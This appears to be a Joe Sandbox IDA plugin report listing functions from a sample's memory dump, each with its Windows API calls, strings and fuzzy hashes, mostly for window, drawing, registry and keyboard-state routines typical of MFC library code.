Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Menu$Exception@8H_prolog3InfoItemMessageParentSendSystemThrow_memset
String ID: 0
API String ID: 177973330-4108050209
Opcode ID: d9d63fb717ea55a943267a0af31e20b185713f68d8b80274d02cbe9062ebff57
Instruction ID: 791e9a586638424c83644e7ab7c58e965346ea316ff2495eaa23078f4ecddd76
Opcode Fuzzy Hash: d9d63fb717ea55a943267a0af31e20b185713f68d8b80274d02cbe9062ebff57
Instruction Fuzzy Hash: 7721C332600258BFDB20ABB0DC8AFAE7BB9FB04350F054075F614AA191EB709D40DBA5

Function 00BD4D93 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 00BD4DCE
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00BD4DF9
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00BD4E24
RegCloseKey.ADVAPI32(?), ref: 00BD4E38
RegCloseKey.ADVAPI32(?), ref: 00BD4E42

Part of subcall function 00BD4CB8: GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00BD4CCA
Part of subcall function 00BD4CB8: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedA), ref: 00BD4CDA

Strings

software, xrefs: 00BD4DB0

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CloseCreate$AddressHandleModuleOpenProc
String ID: software
API String ID: 550756860-2010147023
Opcode ID: c23e4fa785235ff55b8df5d03d46b8f4c00d32d9f6b56166e9d111a93abff169
Instruction ID: 2319767e99ef368dfa54fa092562e58564a6021418b04f92f081d081f520868c
Opcode Fuzzy Hash: c23e4fa785235ff55b8df5d03d46b8f4c00d32d9f6b56166e9d111a93abff169
Instruction Fuzzy Hash: B2211A31900158FB8B259F86CC84DAFFFBAEBC5710B2441ABF506A2210E7315E40DB61

Function 00C55369 Relevance: 10.6, APIs: 7, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C55370

Part of subcall function 00C552B7: __EH_prolog3.LIBCMT ref: 00C552BE
Part of subcall function 00C552B7: GetProfileIntA.KERNEL32(windows,DragMinDist,00000002), ref: 00C55316
Part of subcall function 00C552B7: GetProfileIntA.KERNEL32(windows,DragDelay,000000C8), ref: 00C55328

CopyRect.USER32(?,?), ref: 00C5539E
GetCursorPos.USER32(?), ref: 00C553B0
SetRect.USER32(?,?,?,?,?), ref: 00C553C6
IsRectEmpty.USER32(?), ref: 00C553E1
InflateRect.USER32(?,00000002,00000002), ref: 00C553F3
DoDragDrop.OLE32(00000000,00000000,?,00000000), ref: 00C5544A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Profile$CopyCursorDragDropEmptyH_prolog3H_prolog3_Inflate
String ID:
API String ID: 1837043813-0
Opcode ID: 54201dd1b412005558c85aafe553b02f7c3bdaf14920762bf5d1c9e333f22bf4
Instruction ID: c3790381f374c2570fdbd03659864ebf41c40cb4dfabc7110abb5736f410dfd2
Opcode Fuzzy Hash: 54201dd1b412005558c85aafe553b02f7c3bdaf14920762bf5d1c9e333f22bf4
Instruction Fuzzy Hash: 7B217E7A900648EFCB01AFE0CC94AAEBBB8FF44741B004419F916AB254DB74A989DB55

Function 00C0C833 Relevance: 10.6, APIs: 7, Instructions: 76windowCOMMON

Download Yara Rule

APIs

FillRect.USER32(?,?), ref: 00C0C855
InflateRect.USER32(?,000000FF,000000FF), ref: 00C0C863
PatBlt.GDI32(?,?,?,00000001,?,005A0049), ref: 00C0C88F
PatBlt.GDI32(?,?,?,?,00000001,005A0049), ref: 00C0C8A4
PatBlt.GDI32(?,00000000,?,00000001,?,005A0049), ref: 00C0C8B9
PatBlt.GDI32(?,?,?,00000000,00000001,005A0049), ref: 00C0C8CF
FillRect.USER32(?,?), ref: 00C0C8E4

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Fill$Inflate
String ID:
API String ID: 2224923502-0
Opcode ID: f4b20b1bb302af4351645cdbded20961b641cfd9e688443e78477f46e1b444b9
Instruction ID: d075fc15e6d0136c7f166502725fd9d05fe64b09925d734a48020404bbe01f96
Opcode Fuzzy Hash: f4b20b1bb302af4351645cdbded20961b641cfd9e688443e78477f46e1b444b9
Instruction Fuzzy Hash: F421C476100149FFDF01DF58DD89EAA7FA9FB48320F148115BE159A2A4C771E920DBA0

Function 00BDCA47 Relevance: 10.6, APIs: 7, Instructions: 73COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00BDCA69
GetWindowRect.USER32(?,?), ref: 00BDCA8D
ScreenToClient.USER32(?,?), ref: 00BDCAA0
ScreenToClient.USER32(?,?), ref: 00BDCAA9
EqualRect.USER32(?,?), ref: 00BDCAB0
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 00BDCADA
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 00BDCAE4

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 16750e97b7d85d7c2af80f88b06842caa472ea895da8e833f581975e7a20bbbd
Instruction ID: 77f3b33f6021ae8879bd6007528a2b8747dbaab5de1b1f3e74d8ab00e9777ad6
Opcode Fuzzy Hash: 16750e97b7d85d7c2af80f88b06842caa472ea895da8e833f581975e7a20bbbd
Instruction Fuzzy Hash: 8621E175A0020AAFDB10DFA5DC84AAFBBFDFF48740B20446AE515E7254EB34AD41CB61

Function 00BE31E4 Relevance: 10.6, APIs: 7, Instructions: 73COMMON

Download Yara Rule

APIs

RealChildWindowFromPoint.USER32(?,?,?), ref: 00BE3209
ClientToScreen.USER32(?,?), ref: 00BE3228
GetWindow.USER32(?,00000005), ref: 00BE328B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$ChildClientFromPointRealScreen
String ID:
API String ID: 2518355518-0
Opcode ID: 7ca312cdbbce594af7df377e1ca418ace848bfcf08da103a222814f1321dda0c
Instruction ID: ffa41b60a14eabc418687a855d30024a5163fefbf0059ac414a94e53141afa93
Opcode Fuzzy Hash: 7ca312cdbbce594af7df377e1ca418ace848bfcf08da103a222814f1321dda0c
Instruction Fuzzy Hash: 2E21307191165AAFDB10CFA5DC48BFE7BF8EF19711F100119E501E7150D778AA418BA1

Function 00BF7BFC Relevance: 10.6, APIs: 7, Instructions: 73windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000407,00000000,?), ref: 00BF7C28
IsRectEmpty.USER32(?), ref: 00BF7C47
IsRectEmpty.USER32(?), ref: 00BF7C54
GetCursorPos.USER32(00000000), ref: 00BF7C66
ScreenToClient.USER32(?,00000000), ref: 00BF7C73
PtInRect.USER32(?,00000000,00000000), ref: 00BF7C86
PtInRect.USER32(?,00000000,00000000), ref: 00BF7C99

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Empty$ClientCursorMessageScreenSend
String ID:
API String ID: 703117857-0
Opcode ID: 7798a5b73bd0264410c56f1fc4f1d0b041168544e6e662b46f7969f2cd9d7a19
Instruction ID: 7bc0cda3716868cda7067e33fe45b2a78e50b2aa9fb0754180f9f42b697df514
Opcode Fuzzy Hash: 7798a5b73bd0264410c56f1fc4f1d0b041168544e6e662b46f7969f2cd9d7a19
Instruction Fuzzy Hash: 12214C7650020EBFDF109BA4CC44FEE7BF9EB08350F0004A5E64596161DB31E989DB60

Function 00BE28D6 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 00BE28E3
SendMessageA.USER32(?,00000365,00000000,00000000), ref: 00BE28FE
GetFocus.USER32 ref: 00BE2913
SendMessageA.USER32(?,00000365,00000000,00000000), ref: 00BE2921
GetLastActivePopup.USER32(?), ref: 00BE294A
SendMessageA.USER32(?,00000365,00000000,00000000), ref: 00BE2957

Part of subcall function 00BE0521: GetWindowLongA.USER32(?,000000F0), ref: 00BE0547
Part of subcall function 00BE0521: GetParent.USER32(?), ref: 00BE0555

SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 00BE297D

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
String ID:
API String ID: 3338174999-0
Opcode ID: a88e783d16043173a1829db662425fbf4d73db983cef42f5ef873acd102acfc6
Instruction ID: ff6354229be902723415b0bde029f7fc83b53ae6758e1f2b010a065cc2d5716a
Opcode Fuzzy Hash: a88e783d16043173a1829db662425fbf4d73db983cef42f5ef873acd102acfc6
Instruction Fuzzy Hash: 31112EB5900199FFDF11ABA2DDC5DAE7EFDEF60344B1010F5F501A6121D7719E40AA20

Function 00C119A0 Relevance: 10.6, APIs: 7, Instructions: 69keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32(00000012), ref: 00C119D0
GetAsyncKeyState.USER32(00000012), ref: 00C119EA
GetKeyboardState.USER32(?), ref: 00C11A0C
GetKeyboardLayout.USER32(?), ref: 00C11A1A
MapVirtualKeyA.USER32(?,00000000), ref: 00C11A34
ToAsciiEx.USER32(?,00000000), ref: 00C11A3C
CharUpperA.USER32(?), ref: 00C11A5C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: State$AsyncKeyboard$AsciiCharLayoutUpperVirtual
String ID:
API String ID: 1513035088-0
Opcode ID: caf7f8b5670876e7628c7eceeb89a2fca783c05b0988004284803154ea0e0d6a
Instruction ID: 57378b21a3541f47e9bc76b91756db4f16b1e4c319cbd51fa9445d0e455d492d
Opcode Fuzzy Hash: caf7f8b5670876e7628c7eceeb89a2fca783c05b0988004284803154ea0e0d6a
Instruction Fuzzy Hash: 9E21F635901258AFDB10DB60CC84BFDBBBCEB16740F0400A6EA90D6140DBB4AEC5EFA1

Function 00C4E9AC Relevance: 10.6, APIs: 7, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000037), ref: 00C4E9C9
GetSystemMetrics.USER32(00000032), ref: 00C4E9CF
GetSystemMetrics.USER32(00000037), ref: 00C4E9DB
GetSystemMetrics.USER32(00000036), ref: 00C4E9E1
GetSystemMetrics.USER32(00000031), ref: 00C4E9E7
GetSystemMetrics.USER32(00000036), ref: 00C4E9F3
DrawIconEx.USER32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00C4EA2A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MetricsSystem$DrawIcon
String ID:
API String ID: 2707151559-0
Opcode ID: d1feb9010d1370429be8fc1392c9c99685a622f666bb5ac2936cb3b0be3d54e0
Instruction ID: 3d14cd666f3b913665cc139876f41f5b2e983054b1628e5cdee71e21856b7ed5
Opcode Fuzzy Hash: d1feb9010d1370429be8fc1392c9c99685a622f666bb5ac2936cb3b0be3d54e0
Instruction Fuzzy Hash: F011E931740214BBD7118A658C45F5E7E99FF947A0F29812AB608AF1C1D5B2DA02C7D0

Function 00C3AF3B Relevance: 10.6, APIs: 7, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C3AF42
~_Task_impl.LIBCPMT ref: 00C3AFBF
~_Task_impl.LIBCPMT ref: 00C3AFDD
~_Task_impl.LIBCPMT ref: 00C3AFEC
~_Task_impl.LIBCPMT ref: 00C3AFFB
~_Task_impl.LIBCPMT ref: 00C3B00A
~_Task_impl.LIBCPMT ref: 00C3B019

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Task_impl$H_prolog3
String ID:
API String ID: 1204490572-0
Opcode ID: afb0b2a828dbc0f7e773e486f01d0c7588650456ebb5668dfaa61c4e4766c619
Instruction ID: bf62c10271fdd13ee09bd790bdcf5466120ea0cef6dfd3bcbbaa7818fea487a8
Opcode Fuzzy Hash: afb0b2a828dbc0f7e773e486f01d0c7588650456ebb5668dfaa61c4e4766c619
Instruction Fuzzy Hash: 91216A74408781CEDB24FBB4C5657ADBBA0AF25304F50499CE9EB13282DFB06A49D726

Function 00BD3784 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00BD3796
GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 00BD37B3
GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 00BD37BD

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Strings

ApplicationRecoveryFinished, xrefs: 00BD37B5
KERNEL32.DLL, xrefs: 00BD378E
ApplicationRecoveryInProgress, xrefs: 00BD37AD

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
String ID: ApplicationRecoveryFinished$ApplicationRecoveryInProgress$KERNEL32.DLL
API String ID: 417325364-4287352451
Opcode ID: ed0a995ccb608fc308d3c226c437746a81b3319653bb281f8a81352b68d84b61
Instruction ID: 848949c5ec16c7b9fcfb9b9d4791d39132bb29551a99ea1798aab031f2a1bcd7
Opcode Fuzzy Hash: ed0a995ccb608fc308d3c226c437746a81b3319653bb281f8a81352b68d84b61
Instruction Fuzzy Hash: FD01D8B6600695AFC710D7B58C49F6FBBE8EF84760F1100B9E50193341EA74DE05C6A2

Function 00BD36EC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00BD36F9
GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 00BD3716
GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 00BD3720

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Strings

RegisterApplicationRecoveryCallback, xrefs: 00BD3718
RegisterApplicationRestart, xrefs: 00BD3710
KERNEL32.DLL, xrefs: 00BD36F4

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
String ID: KERNEL32.DLL$RegisterApplicationRecoveryCallback$RegisterApplicationRestart
API String ID: 417325364-723216104
Opcode ID: cae1820ff79f4dac97dd6b86a55b05796abb96813e796b7e0774748ec8c19363
Instruction ID: 73c65705fe97a653eeb5092fa1bd6cd1a094d7f7379f9ec92c8df9fc61f62139
Opcode Fuzzy Hash: cae1820ff79f4dac97dd6b86a55b05796abb96813e796b7e0774748ec8c19363
Instruction Fuzzy Hash: C6F04FB350065BAB8F215EA69C45D9BBEE9DF84FA07010072F91492211FA71ED219BA2

Function 00C4709D Relevance: 9.5, APIs: 6, Instructions: 481COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00C470D8

Part of subcall function 00C453FD: SetRectEmpty.USER32(?), ref: 00C4540A
Part of subcall function 00C453FD: GetWindowRect.USER32(?,?), ref: 00C4541B

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

GetWindowRect.USER32(?,?), ref: 00C4731E
IntersectRect.USER32(?,?,?), ref: 00C4732F
IntersectRect.USER32(?,?,?), ref: 00C4736C
GetWindowRect.USER32(?,?), ref: 00C4753B
EqualRect.USER32(?,?), ref: 00C47554

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Window$EmptyIntersect$EqualException@8H_prolog3Throw
String ID:
API String ID: 3941049809-0
Opcode ID: 843a4689ba68890ebdb45ca87d3018c7c5cfcbd5e44632833bfbe17bec035af5
Instruction ID: 796ec5a4c38440d5078bf122f9970243a0185ae00bc5e418442d0b2f03976176
Opcode Fuzzy Hash: 843a4689ba68890ebdb45ca87d3018c7c5cfcbd5e44632833bfbe17bec035af5
Instruction Fuzzy Hash: EA124B71D04259DFCF21CFA9C984AAEBBB5FF48300F154269E819AB211D771AE41DF90

Function 00BEF665 Relevance: 9.3, APIs: 6, Instructions: 299COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00BEF6DF
GetClientRect.USER32(?,?), ref: 00BEF6F2
GetWindowRect.USER32(?,?), ref: 00BEF740
GetParent.USER32(?), ref: 00BEF749
GetParent.USER32(?), ref: 00BEF966
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00BEF98A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Parent$RectWindow$ClientRedraw
String ID:
API String ID: 443302174-0
Opcode ID: 6acd35fbaf74ebea50b1eda698a58f7451df5459f48e6f6fcced1309b568ad61
Instruction ID: 8ab32f3fa94038c98c607071a2a847bfccd64a45ddcb9571279a889738c60a87
Opcode Fuzzy Hash: 6acd35fbaf74ebea50b1eda698a58f7451df5459f48e6f6fcced1309b568ad61
Instruction Fuzzy Hash: 0CB10571A0025AAFCF15DFA9C898AFEBBF5FF48700F1441B9E416AB255DB309940CB61

Function 00BF8AE3 Relevance: 9.2, APIs: 6, Instructions: 246windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BF8BF8
GetWindowRect.USER32(?,?), ref: 00BF8C11
PtInRect.USER32(?,?,?), ref: 00BF8C2F
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00BF8C40
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00BF8C98

Part of subcall function 00BE0271: GetParent.USER32(?), ref: 00BE027B

GetFocus.USER32 ref: 00BF8D74

Part of subcall function 00C172CA: __EH_prolog3_GS.LIBCMT ref: 00C172D4
Part of subcall function 00C172CA: GetWindowRect.USER32(?,?), ref: 00C1736D
Part of subcall function 00C172CA: SetRect.USER32(00000019,00000000,00000000,?,?), ref: 00C1738F
Part of subcall function 00C172CA: CreateCompatibleDC.GDI32(?), ref: 00C1739B
Part of subcall function 00C172CA: CreateCompatibleBitmap.GDI32(?,00000019,00D2C3B8), ref: 00C173C5
Part of subcall function 00C172CA: GetWindowRect.USER32(?,?), ref: 00C17427
Part of subcall function 00C172CA: GetClientRect.USER32(?,?), ref: 00C17430

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Window$CompatibleCreateMessageSend$BitmapClientCursorFocusH_prolog3_Parent
String ID:
